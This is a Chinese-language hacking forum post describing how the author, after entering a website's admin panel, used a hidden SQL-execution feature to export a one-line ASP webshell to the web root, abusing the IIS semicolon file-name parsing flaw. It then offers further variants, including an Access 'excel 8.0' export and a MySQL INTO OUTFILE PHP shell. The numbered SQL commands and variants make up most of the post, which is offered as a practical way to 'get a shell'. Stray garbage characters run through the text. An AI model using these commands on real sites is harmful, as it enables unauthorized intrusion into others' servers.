中国网络渗透测试联盟

标题: ACCESS执行SQL命令导出一句话SHELL [打印本页]
作者: admin    时间: 2012-9-13 17:53
标题: ACCESS执行SQL命令导出一句话SHELL
好不容易进了后台,发现啥上传啊。备份啊多木有。; }) j. j* o4 _4 |! c8 T
webshell一直拿不到。后来翻了一下源码。有一个执行SQL命令的9 R/ k+ H. {6 e+ H  o
文件。可后台没显示这功能。直接填上文件名字,执行命令的选项出来了,
* Z( A* Z" x' M7 d( n" X1 }( y然后就试用了下面的命令导出一句话木马。没想到成功了。命令方法如下:$ s- i5 O3 F+ |
1.create table cmd (a varchar(50))
: l3 V9 r! f% [) B9 ?2.insert into cmd (a) values (‘‘)4 @8 y! r( S- F" r( B  Z
3.select * into [a] in ‘D:\wwwroot\www.koohik.com\hacker.asa;.xls’ ‘excel 4.0;’ from cmd
- E  f& w# I: P; v(把表cmd的内容导出为物理路径的一个EXCEL文件)+ C& P6 h8 k! b3 q4 l! U
4.drop table cmd% A+ b$ p) N8 E
利用IIS的BUG成功拿到了WEBSHELL。
1 p8 ^$ S$ _9 r0 E, I+ v) u) A# y; k; {
直接菜刀里连接http://www.chouwazi.com/data/xiao.asp;xiao.xls一句话2 {6 K4 N2 ]1 Q
7 A& Q) X5 s8 c" ^9 @. m; ?9 _+ \
  SQL语句意思解释:
) ]" \4 P$ V/ h  第一句
) |- [8 S/ x$ ]+ S  建立一个有一个A字段的表 表名为cmd 字段类型为字符 长度为50; [! X+ F7 \& R% W

" B( B# u( `8 K* \$ r  第二句7 @/ Y/ Y0 k4 R) v. E9 u4 u
  在表cmd的a字段插入一句话木马
1 W; S! B# P% ~: x: k/ b  第三句5 o# }/ h  s- `. V
  把cmd表a的内容导出到路径e:\host\chouwazi.com\web\data\的EXCEL文件
9 N0 M1 @8 Y8 J4 J
' D8 M. V/ P3 @& p* Z  第四句- K9 _, B0 M: l; |; o; h
  删除建立的cmd表
+ y5 _1 I+ L& m
( Y; `1 _; l4 Y$ ^7 l" X( O' p  以下内容为测试:
8 q% B- H+ s/ |% @% ?+ E( g- n/ k  Access利用后台SQL执行命令功能导出WebShell:4 i* E5 n+ Y1 t% p: R+ O
  这个更简单:
7 `/ T: g; M% m3 t! P3 s  [ol][li]Select 'asp一句话木马' into [vote] in 'd:/chouwazi.com/x.asp;.xls' 'excel 8.0;' from vote [/li][/ol]) H$ s7 M: ?2 T$ @
  或者4 Q  u; f1 V$ z6 E4 n# c
  [ol][li]Select 'php一句话木马' into outfile 'F:/wwwroot/chouwazi.com/eval.php'; [/li][/ol]# z, F7 H$ o: X; Q" _: t' X

3 G- x$ z; t! R& s2 n- V  后台有执行SQL语句功能(vote为已知表段)
( u2 J  g2 v) W6 S: Q$ j  希望对大家有所帮助拿shell的又一个思路% R% X! @0 n+ I* z- h) u$ `& Y8 F




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2